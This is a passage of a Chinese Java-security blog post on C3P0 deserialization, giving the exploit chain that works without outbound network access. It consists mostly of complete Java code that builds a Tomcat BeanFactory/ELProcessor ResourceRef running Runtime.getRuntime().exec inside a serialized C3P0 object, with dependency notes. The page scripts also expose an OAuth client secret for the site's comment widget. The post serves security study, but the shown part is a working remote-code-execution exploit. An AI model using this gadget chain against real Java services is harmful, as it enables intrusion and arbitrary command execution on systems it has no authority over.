<h3 id="利用链构造"><a href="#利用链构造" class="headerlink" title="利用链构造"></a>利用链构造</h3><p>由于BeanFactory中需要Reference为ResourceRef类，因此在getReference()中我们实例化ResourceRef类，剩下的构造就和高版本JNDI类似了</p>
<figure class="highlight yaml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="string">package</span> <span class="string">C3P0;</span></span><br><span class="line"> </span><br><span class="line"><span class="string">import</span> <span class="string">com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;</span></span><br><span class="line"><span class="string">import</span> <span class="string">org.apache.naming.ResourceRef;</span></span><br><span class="line"> </span><br><span class="line"><span class="string">import</span> <span class="string">javax.naming.NamingException;</span></span><br><span class="line"><span class="string">import</span> <span class="string">javax.naming.Reference;</span></span><br><span class="line"><span class="string">import</span> <span class="string">javax.naming.Referenceable;</span></span><br><span class="line"><span class="string">import</span> <span class="string">javax.naming.StringRefAddr;</span></span><br><span class="line"><span class="string">import</span> <span class="string">javax.sql.ConnectionPoolDataSource;</span></span><br><span class="line"><span class="string">import</span> <span class="string">javax.sql.PooledConnection;</span></span><br><span class="line"><span class="string">import</span> <span class="string">java.io.*;</span></span><br><span class="line"><span class="string">import</span> <span class="string">java.lang.reflect.Field;</span></span><br><span class="line"><span class="string">import</span> <span class="string">java.sql.SQLException;</span></span><br><span class="line"><span class="string">import</span> <span class="string">java.sql.SQLFeatureNotSupportedException;</span></span><br><span class="line"><span class="string">import</span> <span class="string">java.util.logging.Logger;</span></span><br><span class="line"> </span><br><span class="line"><span class="string">public</span> <span class="string">class</span> <span class="string">C3P0_Tomcat8</span> {</span><br><span class="line"> </span><br><span class="line">    <span class="string">public</span> <span class="string">static</span> <span class="string">class</span> <span class="string">Tomcat8_Loader</span> <span class="string">implements</span> <span class="string">ConnectionPoolDataSource</span>, <span class="string">Referenceable</span> {</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">Reference</span> <span class="string">getReference()</span> <span class="string">throws</span> <span class="string">NamingException</span> {</span><br><span class="line">            <span class="string">ResourceRef</span> <span class="string">resourceRef</span> <span class="string">=</span> <span class="string">new</span> <span class="string">ResourceRef("javax.el.ELProcessor"</span>, <span class="string">(String)null</span>, <span class="string">""</span>, <span class="string">""</span>, <span class="literal">true</span>, <span class="string">"org.apache.naming.factory.BeanFactory"</span>, <span class="string">(String)null);</span></span><br><span class="line">            <span class="string">resourceRef.add(new</span> <span class="string">StringRefAddr("forceString"</span>, <span class="string">"faster=eval"</span><span class="string">));</span></span><br><span class="line">            <span class="string">resourceRef.add(new</span> <span class="string">StringRefAddr("faster"</span>, <span class="string">"Runtime.getRuntime().exec(\"calc\")"</span><span class="string">));</span></span><br><span class="line">            <span class="string">return</span> <span class="string">resourceRef;</span></span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">PooledConnection</span> <span class="string">getPooledConnection()</span> <span class="string">throws</span> <span class="string">SQLException</span> {</span><br><span class="line">            <span class="string">return</span> <span class="literal">null</span><span class="string">;</span></span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">PooledConnection</span> <span class="string">getPooledConnection(String</span> <span class="string">user</span>, <span class="string">String</span> <span class="string">password)</span> <span class="string">throws</span> <span class="string">SQLException</span> {</span><br><span class="line">            <span class="string">return</span> <span class="literal">null</span><span class="string">;</span></span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">PrintWriter</span> <span class="string">getLogWriter()</span> <span class="string">throws</span> <span class="string">SQLException</span> {</span><br><span class="line">            <span class="string">return</span> <span class="literal">null</span><span class="string">;</span></span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">void</span> <span class="string">setLogWriter(PrintWriter</span> <span class="string">out)</span> <span class="string">throws</span> <span class="string">SQLException</span> {</span><br><span class="line"> </span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">void</span> <span class="string">setLoginTimeout(int</span> <span class="string">seconds)</span> <span class="string">throws</span> <span class="string">SQLException</span> {</span><br><span class="line"> </span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">int</span> <span class="string">getLoginTimeout()</span> <span class="string">throws</span> <span class="string">SQLException</span> {</span><br><span class="line">            <span class="string">return</span> <span class="number">0</span><span class="string">;</span></span><br><span class="line">        }</span><br><span class="line"> </span><br><span class="line">        <span class="string">@Override</span></span><br><span class="line">        <span class="string">public</span> <span class="string">Logger</span> <span class="string">getParentLogger()</span> <span class="string">throws</span> <span class="string">SQLFeatureNotSupportedException</span> {</span><br><span class="line">            <span class="string">return</span> <span class="literal">null</span><span class="string">;</span></span><br><span class="line">        }</span><br><span class="line">    }</span><br><span class="line"> </span><br><span class="line">    <span class="string">//序列化</span></span><br><span class="line">    <span class="string">public</span> <span class="string">static</span> <span class="string">void</span> <span class="string">Pool_Serial(ConnectionPoolDataSource</span> <span class="string">c)</span> <span class="string">throws</span> <span class="string">NoSuchFieldException</span>, <span class="string">IllegalAccessException</span>, <span class="string">IOException</span> {</span><br><span class="line">        <span class="string">//反射修改connectionPoolDataSource属性值</span></span><br><span class="line">        <span class="string">PoolBackedDataSourceBase</span> <span class="string">poolBackedDataSourceBase</span> <span class="string">=</span> <span class="string">new</span> <span class="string">PoolBackedDataSourceBase(false);</span></span><br><span class="line">        <span class="string">Class</span> <span class="string">cls</span> <span class="string">=</span> <span class="string">poolBackedDataSourceBase.getClass();</span></span><br><span class="line">        <span class="string">Field</span> <span class="string">field</span> <span class="string">=</span> <span class="string">cls.getDeclaredField("connectionPoolDataSource");</span></span><br><span class="line">        <span class="string">field.setAccessible(true);</span></span><br><span class="line">        <span class="string">field.set(poolBackedDataSourceBase</span>,<span class="string">c);</span></span><br><span class="line"> </span><br><span class="line">        <span class="string">//序列化流写入文件</span></span><br><span class="line">        <span class="string">FileOutputStream</span> <span class="string">fos</span> <span class="string">=</span> <span class="string">new</span> <span class="string">FileOutputStream(new</span> <span class="string">File("exp.bin"));</span></span><br><span class="line">        <span class="string">ObjectOutputStream</span> <span class="string">oos</span> <span class="string">=</span> <span class="string">new</span> <span class="string">ObjectOutputStream(fos);</span></span><br><span class="line">        <span class="string">oos.writeObject(poolBackedDataSourceBase);</span></span><br><span class="line"> </span><br><span class="line">    }</span><br><span class="line"> </span><br><span class="line">    <span class="string">//反序列化</span></span><br><span class="line">    <span class="string">public</span> <span class="string">static</span> <span class="string">void</span> <span class="string">Pool_Deserial()</span> <span class="string">throws</span> <span class="string">IOException</span>, <span class="string">ClassNotFoundException</span> {</span><br><span class="line">        <span class="string">FileInputStream</span> <span class="string">fis</span> <span class="string">=</span> <span class="string">new</span> <span class="string">FileInputStream(new</span> <span class="string">File("exp.bin"));</span></span><br><span class="line">        <span class="string">ObjectInputStream</span> <span class="string">objectInputStream</span> <span class="string">=</span> <span class="string">new</span> <span class="string">ObjectInputStream(fis);</span></span><br><span class="line">        <span class="string">objectInputStream.readObject();</span></span><br><span class="line">    }</span><br><span class="line"> </span><br><span class="line">    <span class="string">public</span> <span class="string">static</span> <span class="string">void</span> <span class="string">main(String</span>[] <span class="string">args)</span> <span class="string">throws</span> <span class="string">IOException</span>, <span class="string">NoSuchFieldException</span>, <span class="string">IllegalAccessException</span>, <span class="string">ClassNotFoundException</span> {</span><br><span class="line">        <span class="string">Tomcat8_Loader</span> <span class="string">tomcat8_loader</span> <span class="string">=</span> <span class="string">new</span> <span class="string">Tomcat8_Loader();</span></span><br><span class="line">        <span class="string">Pool_Serial(tomcat8_loader);</span></span><br><span class="line">        <span class="string">Pool_Deserial();</span></span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>注意，由于Tomcat8的EL依赖可能不完整，利用的时候可能会失败，最好依赖下面两个包</p>
<figure class="highlight yaml"><table><tbody><tr><td class="code"><pre><span class="line"><span class="string">&lt;dependency&gt;</span></span><br><span class="line">    <span class="string">&lt;groupId&gt;org.apache.tomcat&lt;/groupId&gt;</span></span><br><span class="line">    <span class="string">&lt;artifactId&gt;tomcat-catalina&lt;/artifactId&gt;</span></span><br><span class="line">    <span class="string">&lt;version&gt;8.5.0&lt;/version&gt;</span></span><br><span class="line"><span class="string">&lt;/dependency&gt;</span></span><br><span class="line"><span class="string">&lt;dependency&gt;</span></span><br><span class="line">    <span class="string">&lt;groupId&gt;org.apache.tomcat.embed&lt;/groupId&gt;</span></span><br><span class="line">    <span class="string">&lt;artifactId&gt;tomcat-embed-el&lt;/artifactId&gt;</span></span><br><span class="line">    <span class="string">&lt;version&gt;8.5.15&lt;/version&gt;</span></span><br><span class="line"><span class="string">&lt;/dependency&gt;</span></span><br></pre></td></tr></tbody></table></figure>

      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/java%E5%AE%89%E5%85%A8/" rel="tag">java安全</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag">web安全</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="https://cdn.pixabay.com/photo/2023/06/28/16/11/ai-generated-8094738_960_720.png" data-sizes="auto" alt="sklearn与特征工程" class="lazyload">
          
        
        <a href="/2024/02/27/sklearn%E4%B8%8E%E7%89%B9%E5%BE%81%E5%B7%A5%E7%A8%8B/"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
          
            sklearn与特征工程
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="https://cdn.pixabay.com/photo/2024/01/22/10/49/ai-generated-8524877_1280.jpg" data-sizes="auto" alt="SnakeYaml反序列化漏洞" class="lazyload">
        
      
      <a href="/2024/01/22/SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
        
          SnakeYaml反序列化漏洞
        
      </h3>
    </div>
    
  </nav>


  
</article>




  <div id="comments" class="gtcomment"></div>



</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#C3P0%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">C3P0介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#URLClassLoader%E8%BF%9C%E7%A8%8B%E7%B1%BB%E5%8A%A0%E8%BD%BD"><span class="toc-number">1.1.</span> <span class="toc-text">URLClassLoader远程类加载</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B"><span class="toc-number">1.1.0.0.1.</span> <span class="toc-text">过程</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#EXP%E7%BC%96%E5%86%99"><span class="toc-number">1.1.0.0.2.</span> <span class="toc-text">EXP编写</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JNDI%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.</span> <span class="toc-text">JNDI注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">过程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#EXP"><span class="toc-number">1.2.2.</span> <span class="toc-text">EXP</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%99%AE%E9%80%9Aexp"><span class="toc-number">1.2.2.0.1.</span> <span class="toc-text">普通exp</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#fastjson%E7%89%88"><span class="toc-number">1.2.2.0.2.</span> <span class="toc-text">fastjson版</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SnakeYaml%E7%89%88"><span class="toc-number">1.2.2.0.3.</span> <span class="toc-text">SnakeYaml版</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HEX%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.3.</span> <span class="toc-text">HEX二次反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B-2"><span class="toc-number">1.3.1.</span> <span class="toc-text">过程</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#C3P0%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">C3P0不出网利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE%E6%9E%84%E9%80%A0"><span class="toc-number">2.0.1.</span> <span class="toc-text">利用链构造</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">46</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">7</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">71</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2023-2025
      <span class="footer-info-sep"></span>
      Yyjccc
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        159.3k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        10:49
      </div>
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#C3P0%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">C3P0介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#URLClassLoader%E8%BF%9C%E7%A8%8B%E7%B1%BB%E5%8A%A0%E8%BD%BD"><span class="toc-number">1.1.</span> <span class="toc-text">URLClassLoader远程类加载</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B"><span class="toc-number">1.1.0.0.1.</span> <span class="toc-text">过程</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#EXP%E7%BC%96%E5%86%99"><span class="toc-number">1.1.0.0.2.</span> <span class="toc-text">EXP编写</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JNDI%E6%B3%A8%E5%85%A5"><span class="toc-number">1.2.</span> <span class="toc-text">JNDI注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">过程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#EXP"><span class="toc-number">1.2.2.</span> <span class="toc-text">EXP</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%99%AE%E9%80%9Aexp"><span class="toc-number">1.2.2.0.1.</span> <span class="toc-text">普通exp</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#fastjson%E7%89%88"><span class="toc-number">1.2.2.0.2.</span> <span class="toc-text">fastjson版</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#SnakeYaml%E7%89%88"><span class="toc-number">1.2.2.0.3.</span> <span class="toc-text">SnakeYaml版</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#HEX%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="toc-number">1.3.</span> <span class="toc-text">HEX二次反序列化</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%87%E7%A8%8B-2"><span class="toc-number">1.3.1.</span> <span class="toc-text">过程</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#C3P0%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text">C3P0不出网利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE%E6%9E%84%E9%80%A0"><span class="toc-number">2.0.1.</span> <span class="toc-text">利用链构造</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">46</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">7</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">71</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div class="reimu-search-input" id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/reimu.png"/>
        </div>
      </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>






  
<script src="https://npm.webcache.cn/gitalk/dist/gitalk.min.js" data-pjax></script>

  
  <script data-pjax>
    var gitalkId = location.pathname;
    var gitalk = new Gitalk({
      clientID: '0efb4a442bc09d1ba17e',
      clientSecret: 'd26f520fef841de4f4388029a0d5c0f4730357cf',
      repo: 'https://github.com/Yyjccc/yyjccc.github.io.git',
      owner: 'Yyjccc',
      admin: "Yyjccc",
      id: gitalkId, // Ensure uniqueness and length less than 50
      distractionFreeMode: false // Facebook-like distraction free mode
    })
    if (document.getElementById('comments')) {
      gitalk.render('comments')
    }
  </script>







  
<script src="/js/generator_search.js" defer></script>






  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>




  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    quicklink.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.0-alpha.1' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  

<script data-pjax>
  var updateTime = _$('#post-update-time')?.innerHTML;

  if (updateTime) {
    const update = new Date(updateTime);
    const now = new Date();
    const diff = now - update;
    const days = diff / 86400000;
    const { daysAgo, message: template } = window.outdate;
    if (days >= daysAgo) {
      const message = template.replace(/{time}/, updateTime);
      const blockquote = _$('#outdate-blockquote');
      if (blockquote) {
        blockquote.querySelector('p').innerText = message;
        blockquote.style.display = 'block';
      }
    }
  }
</script>


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script><!-- hexo-inject:begin --><!-- hexo-inject:end --></body>
  </html>

